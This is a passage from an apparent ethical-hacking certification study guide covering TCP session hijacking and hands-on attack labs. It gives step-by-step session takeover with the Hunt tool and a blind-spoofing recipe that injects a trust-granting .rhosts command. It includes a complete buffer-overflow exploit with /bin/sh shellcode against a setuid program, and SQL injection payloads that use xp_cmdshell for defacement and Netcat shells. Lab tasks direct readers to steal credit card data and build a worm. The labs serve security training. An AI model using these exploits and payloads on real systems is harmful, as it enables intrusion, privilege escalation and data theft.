one may have to DoS attack a server in order to keep it from sending RST (reset) packets to the victim. If
I were to detail a DoS technique (with every available argument) it would distract thoughts away from
the real topic of this article. Some knowledge will have to be gleaned from RFC's, man pages, code
comments, by researching on your own, or by merely using your intelligence to conceive of
vulnerabilities not discussed herein; Hence, the word "primer". No one wrote me a little "session
hijacking for dummies" book and I figured it out, so you can too.
Disclaimer:
This paper describes nothing more than some vulnerabilities of the Transmission Control Protocol and
tools/thoughts which exploit those vulnerabilities. It is intended for educational use only. You are
responsible for what you do with this information. I am no more responsible for people committing
crimes with this information then chemistry instructors are responsible for people who construct bombs
or chemical warfare devices. [Insert expensive lawyer jargon here to stave off unfounded FBI allegations
ala Sil]. All your base are belong to us.
Contents:
A look at TCP
C|EH Study Guide
Hacker University Page 47
Local Network Session Hijacking
Remote Network Session Hijacking
Defending against session hijack attacks
A Look At TCP
Transmission Control Protocol (TCP) is addressed in RFC 793. For the sake of brevity, I will only cover
relevant portions of the RFC; adding information to it when necessary. The Transmission Control
Protocol (TCP) is intended for use as a highly reliable host-to host protocol between hosts in packet-
switched computer communication networks, and in interconnected systems of such networks.
TCP must recover from data that is damaged, lost, duplicated, or delivered out of order by the internet
communication system. This is achieved by assigning a sequence number to each octet transmitted, and
requiring a positive acknowledgment (ACK) from the receiving TCP. If the ACK is not received within a
timeout interval, the data is retransmitted. At the receiver, the sequence numbers are used to correctly
order segments that may be received out of order and to eliminate duplicates. Damage is handled by
adding a checksum to each segment transmitted, checking it at the receiver, and discarding damaged
segments.
A fundamental notion in the design is that every octet of data sent over a TCP connection has a
sequence number. Since every octet is sequenced, each of them can be acknowledged. The
acknowledgment mechanism employed is cumulative so that an acknowledgment of sequence number
X indicates that all octets up to but not including X have been received. This mechanism allows for
straight-forward duplicate detection in the presence of retransmission. Numbering of octets within a
C|EH Study Guide
Hacker University Page 48
segment is: the first data octet immediately following the header is the lowest numbered, and the
following octets are numbered consecutively.
It is essential to remember that the actual sequence number space is finite, though very large. This
space ranges from 0 to 4294967295 (2**32)-1. Since the space is finite, all arithmetic dealing with
sequence numbers must be performed modulo 2**32 (4294967296). This unsigned arithmetic preserves
the relationship of sequence numbers as they cycle from 2**32 - 1 to 0 again. There are some subtleties
to computer modulo arithmetic, so great care should be taken in programming the comparison of such
values. So you see that the ISN can be any number between 0 and 4294967295. You also hopefully
noticed that every octet has a sequence number, not every session. The server (TCPB) will respond to
the client (TCPA) with it's own sequence number, while acknowledging the clients sequence number.
See below for an example:
Sequence prediction to take over networks was first written about in 1985 (or thereabouts) by none
other than Robert T. Morris (his son created the first Internet worm). The first attack employing this
technique did not occur until Christmas of '94, this is known as the Mitnick hack of Shimomura (or
"Christmas hack"). Over the years, OS's have become more random in deriving the ISN, but we all know
that computers are not random thinkers. Eventually over time, even computers choosing random
numbers will repeat themselves, because the randomness is based on an internal algorithm. There is a
great in-depth article, which can be found here, that explores sequence number generation and
prediction in more detail.
Once a sequence number has been agreed to, all following data will be the ISN+1. This makes injecting
data into the communication stream possible, if one were so inclined. The tricky part is not hijacking the
session, but in finding out the ISN. Once the ISN (or the ISN increment) is discovered, everything else is
gravy.
3 requirements to hijack non-encrypted TCP communications:
1. There must be non-encrypted session oriented traffic.
C|EH Study Guide
Hacker University Page 49
2. Attacker must be able to recognize TCP sequence numbers and predict what the next sequence
number will be.
3. Attacker must spoof a hosts MAC or IP address to receive communications which are not destined for
the attackers host
If the attacker is on your local segment, they can sniff the connections and therefore see what the ISN+1
number is, they can also have the traffic routed back to them by poisoning the ARP cache. This is why
implementing internal network protocol encryption is so important (albeit rarely done).
Local Network Session Hijacking
Rather then reinvent the wheel, we used a tool that's readily available, called Hunt (downloadable @
netflood.net). We will use the newest version (1.5) because it runs on WindowsME (that's just a joke to
get the kiddies hopes up), you'll actually need Linux or some other *nix variant (though you may have to
port Hunt to work with your specific OS). In my case, I have a test machine running Redhat 7.1 and it
works fine. You shouldn't have a problem using Hunt with any Linux 2.X kernel.
1. Start hunt
2. Select the "u" option (host up tests). This will enable you to see TCP connections on your network (ie.
victims)
3. Enter the victims IP address or your network address
4. Enter victims IP address again or the broadcast address of your local network (This will insure that our
entire network can be victims of this attack).
5. Choose the default answers unless you know what you're doing.
Hunt will now look for victims (based on the range) using a variety of techniques such as ARP
broadcasting and pinging.
6. Choosing "yes" for net ifc promisc test (arp method) option will enable Hunt to do a promiscuous
interface test using an ARP broadcast.
7. Pick the default MAC address
8. Hunt will now want to do a promiscuous test using ping, choose "yes" and default MAC address for
remaining options.
At this point you will be returned to the main menu.
C|EH Study Guide
Hacker University Page 50
"l" to list all active TCP connections
"w" and choosing a connection will enable you to watch the connection (ie. see all unencrypted
communication between the hosts)
Since there is only one TCP session, we'll choose that option by typing "0 " .
We will be prompted if we want to see just source or destination traffic (client/server) or traffic destined
in both directions, choose "both" as only seeing one side of the communication is boring. Don't print
both characters, unless you absolutely need to (if you don't know why you'd need to, then you don't
need to).
We can now watch the entire communication. So if the victim telnets to a server, we will see him
authenticating and doing whatever he decides to do. If he telnets from that server to another server we
can watch him log in and get any information we need. We could just sit and watch the communication
all night but the problem is the victim is typing extremely slow, and that can be irritating for those of us
who type fast. Since that's the case, we should now take over and type for him.
Press control-c and when prompted, to end the show you've just been watching. You will then be
presented with the main screen. We are going to do an "arp/simple hijack" so we choose option "a".
We are again presented with a list of TCP sessions. I'll choose option "0" (or whatever communication I
choose).
I'm going to spoof all addresses, so I'll use the "yes" defaults.
Any old source MAC address will do, so I'll keep the defaults.
I'll press enter and accept the raw input mode.
Since I want to see everything I will dump all connections.
Choose whether or not to print source and destination same characters, in my case I will choose "no".
I now need to press control-c to input myself into the connection.
C|EH Study Guide
Hacker University Page 51
An Arp spoof with a destination IP in another network will fail but that's ok because I don't need to
spoof the server, I just need to spoof the client to communicate with the server. If it asks you to force
the the ARP spoof, choose "no" as it's impossible to ARP spoof a client on a remote network.
I have now hijacked the victims session and I can do anything the user was allowed to do.
You may be asking why you choose any MAC address instead of yours. The answer is because we are
cache poisoning the devices which will relay the traffic to us, whether it is a switch, a router, or every
host on our network segment. This was covered in a previous netflood article here.
If you are wondering why we shouldn't "force the ARP spoof", keep reading. It's actually fundamental
networking concepts. This option would only be valid if we were attempting to hijack a session that was
taking place between two hosts on our network segment.
Remote Network Session Hijacking:
This is far more difficult to do today then it was in yesteryear, but it is not impossible. As this is only a
"primer", I'm not going to go into exact details for determining an ISN (you can go here for more), but I
will give you the fundamental knowledge necessary to help you with the next steps.
Remote Network Session Hijacking (RNSH) leaves the attacker blind. This is why RNSH is also referred to
as "blind spoofing". The reason is because we are exploiting trust relationships between client and
server on a remote network. The trust relationship is established by the rhosts file created when using
services such as rlogin, rsh, or rcp. We cannot spoof a trusted host (found in the rhosts file) on a
different network and see the reply packets because they are never routed back to us. We cannot ARP
cache poison machines on remote networks because routers do not route ARP broadcasts across the
Internet (newbie note: ARP is a layer2 function, routers work at layer3 ). Since we cannot receive the
reply traffic we must anticipate the responses from the victim and keep the host we are pretending to
be (spoofing) from sending a RST to the victim.
RNSH takes advantage of trust relationships between computers and you are spoofing the trusted client.
If the correct spoof rules are configured on edge routers or border gateways, you will have a
tremendously hard time performing a RNSH.
C|EH Study Guide
Hacker University Page 52
Necessary Steps:
1. Gauge the ISN algorithm by connecting to the machine multiple times from a machine which will
receive the responses (ie. not spoofed). You can see the generated ISN by using any number of sniffers
available. Sniffers available from netflood.
1A. From the incremented ISN's figure out what the next ISN will be.
1B. You will need to create packets in order to initiate the hijack.
2. DoS attack the person we will pretend to be. This makes them unresponsive when the server (victim)
sends the SYN-ACK. It also keeps them from sending the dreaded RST (which will become our friend
later on in the TCP DoS section).
3. Spoof the IP address of the trusted host and send a SYN (with the correct ISN) at the appropriate time.
Calculating what the appropriate ISN is, shouldn't be too complicated (that's why we did #1). This should
tell the computer to place the next bits of data into the receive buffer.
4. Now add 1 to the ISN and inject your data. (cat + + >> ~/.rhosts) -command courtesy of here.
Obviously more commands can be used and adding the cat + + command is only useful in certain
situations.
The best way for you to see blind spoofing in action is to read Shimomura's breakdown of Mitnicks
*cough* alleged *cough* attack.
Defending against session hijack attacks
1. Use encrypted protocols, like those found in the OpenSSH suite
The OpenSSH suite includes the ssh program which replaces rlogin and telnet, scp which replaces rcp,
and sftp which replaces ftp. Also included is sshd which is the server side of the package, and the other
basic utilities like ssh-add, ssh-agent, ssh-keygen and sftpserver.
2. Use strong authentication (like Kerberos) or peer-to-peer VPN's.
3. Configure the appropriate spoof rules on gateways (internal and external).
4. Monitor for ARP cache poisoning, by using IDS products or ARPwatch.
Buffer Overflow
1. Start Knoppix
C|EH Study Guide
Hacker University Page 53
2. Open a command shell
3. At the command prompt type rootme
4. At the command prompt type vi
5. Press the i key to enter insert mode
6. Type the following program
int main(int argc, char *argv[])
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
7. Press the ESC key
8. Press the : key
9. Type w vuln.c [press enter]
10. Type :q [press enter]
11. At the command prompt type gcc -o vuln vuln.c
12. At the command prompt type chmod +s vuln
13. At the command prompt type ls -l vuln
14. At the command prompt type ./vuln test [press enter]
Lab#2
1. At the command prompt type vi
2. Press the i key to enter insert mode
3. Type the following program:
#include <stdlib.h>
C|EH Study Guide
Hacker University Page 54
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";
unsigned long sp(void)
{ __asm__("movl %esp, %eax"); }
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
offset = 0;
esp = sp();
ret = esp - offset;
printf("Stack Pointer (ESP) : 0x%x\n, esp");
printf(" Offset from ESP : 0x%x\n, offset");
printf("Desired Return Addr : 0x%x\n, ret");
buffer = malloc(600);
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }
for (i=0; i < 200; i++)
C|EH Study Guide
Hacker University Page 55
{ buffer[i] = '\x90'; }
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }
buffer[600-1] = 0;
execl("./vuln", "vuln", buffer, 0);
free(buffer);
return 0;
}
4. Press the ESC key
5. Press the : key
6. Type w exploit.c [press enter]
7. Type :q [press enter]
8. At the command prompt type gcc -o exploit exploit.c
9. At the command prompt type exit [press enter]
10. At the $ prompt type ./exploit [press enter]
11. At the # prompt type whoami [press enter]
12. At the command prompt type exit [press enter]
Hacking Web Servers Use IIS5-Koei to TFTP Netcat on a victim host. Using Netcat, gain shell access to the computer.
Note: you will need to use a TFTP server for this lab. Ask your instructor if you get stuck.
Web Application Vulnerabilities Lab#1
C|EH Study Guide
Hacker University Page 56
Download Teleport Pro at http://www.tenmax.com/teleport/pro/home.htm
Copy a web site and examine the files.
How do you think a hacker could use a tool like this for malicious purposes?
Lab#2
Use the Metasploit command line and web interface to hack into another machine. Experiment
with different options.
Linux Hacking Open Linux and run TCPDump from the command line. Try out the following options. (You may want to
generate some traffic from your machine in order to capture traffic)
To list the available interfaces tcpdump -D To show all traffic on eth1 tcpdump -i eth1 To capture just TCP tcpdump TCP To capture just UDP tcpdump UDP To capture just 1 port tcpdump port 23 To Dump to a pcap file tcpdump -i eth0 -w test.pcap To read back the packet file tcpdump -r test.pcap To capture only info on src IP and dst IP and protocol, and supress DNS tcpdump -i eth1 -nn -q Read back packet but suppress dns lookup tcpdump -nnr test.pcap
C|EH Study Guide
Hacker University Page 57
As above but give time in easy format tcpdump -ttttnnr test.pcap To collect only 20 Packets tcpdump -c 20 -i eth0 Show Mac address in the output tcpdump -e -i eth0 To capture packets based upon ethernet mac address tcpdump ether src 00:18:4d:18:c0:b8 To listen to a specific tcp port tcpdump -w test.pcap -i eth1 tcp port 6881 To also display the payload of the packet in hex tcpdump -i eth1 -x To display the payload in ascii tcpdump -i eth1 -xX To listen on tcp port 6881 or udp ports 33210 or 33220 tcpdump -w test.pcap -i eth1 tcp port 6881 or udp port \( 33210 or 33220 \) Capture any traffic destined for 10.168.28.22 on tcp port 22 tcpdump -w test.pcap dst 10.168.28.22 and tcp port 22 Capture any traffic from source 10.168.28.22 on tcp port 22 tcpdump -w test.pcap src 10.168.28.22 and tcp port 22 By default the packet capture size is 96 bytes, -s changes that size tcpdump -w test.pcap -s 1550 dst 10.168.28.22 and tcp port 22 Top talkers on network tcpdump -tnn -c 20000 -i eth0 | awk -F "." '{print $1"."$2"."$3"."$4}' | sort | uniq -c | sort -nr | awk ' $1 > 100 '
SQL Injection Lab#1
1. Discover a list of databases:
select * from master..sysdatabases
2. Using a database called Juggybank, get a list of table names:
C|EH Study Guide
Hacker University Page 58
use juggybank;
select * from SysObjects where xType='U';
3. Using a database called Juggybank, get a list of information from the credit card table:
select * from juggybank..Creditcard;
4. Using a database called Juggybank, get a list of information from the UserInfo table:
select * from juggybank..userinfo;'
5. Get a list of information from the UserInfo table where username='joker':
select * from juggybank..userinfo where username='joker';
6. Get a list of information from the UserInfo table where username='joker' and password='joker':
select * from juggybank..userinfo where username='joker' and password='joker';
7. Get a list of information from the UserInfo table where username='joker' and password='' (You should
get no records back because the password for the joker user is not blank):
select * from juggybank..userinfo where username='joker' and password='';
8. Get a list of information from the UserInfo table where username='joker' and password='' or return all
rows if 1 is equal to 1:
select * from juggybank..userinfo where username='joker' and password='' or 1=1--;
Lab#2
Perform SQL injection on your web site.
Go to the Coastal Banc – Online Banking Demo web site on your desktop.
C|EH Study Guide
Hacker University Page 59
For login name, type joker.
For password, type joker.
Press submit. (This should work.)
Next, attempt to login with an invalid username and password. This should fail.
Next, enter the username of:
' OR 1=1—
And enter any password you wish. This should return the first record.
Lab#3
Go to http://localhost/sql/client2.htm
In the Login name field, type the following to create a file on the hard drive of the web server:
';exec master..xp_cmdshell "echo you've-been-hacked > c:\inetpub\wwwroot\default.asp"—
Do not enter anything for the password and press submit.
Open http://localhost.
Lab#4
Using the same technique as SQL injection lab#2, get Netcat started on your victim host and gain access
to the command prompt.
Hint: xp_cmdshell and TFTP
Lab#5
Using SQL injection and the tools in the web hacking and web application hacking sections, attempt to
hack into another computer’s Coastal Bank web site.
Objectives:
C|EH Study Guide
Hacker University Page 60
Steal all credit card information
Deface the web site with the credit card information
Wireless Hacking 1. If you have a laptop with wireless connectivity, download NetStumbler and use it to find wireless
networks.
2. Using Ethereal/Wireshark, sniff the wireless traffic.
Why do you see more traffic in a wireless network than in a wired switched network?
Viruses
Create your own virus using the Windows Scripting Host Worm Construction Kit.
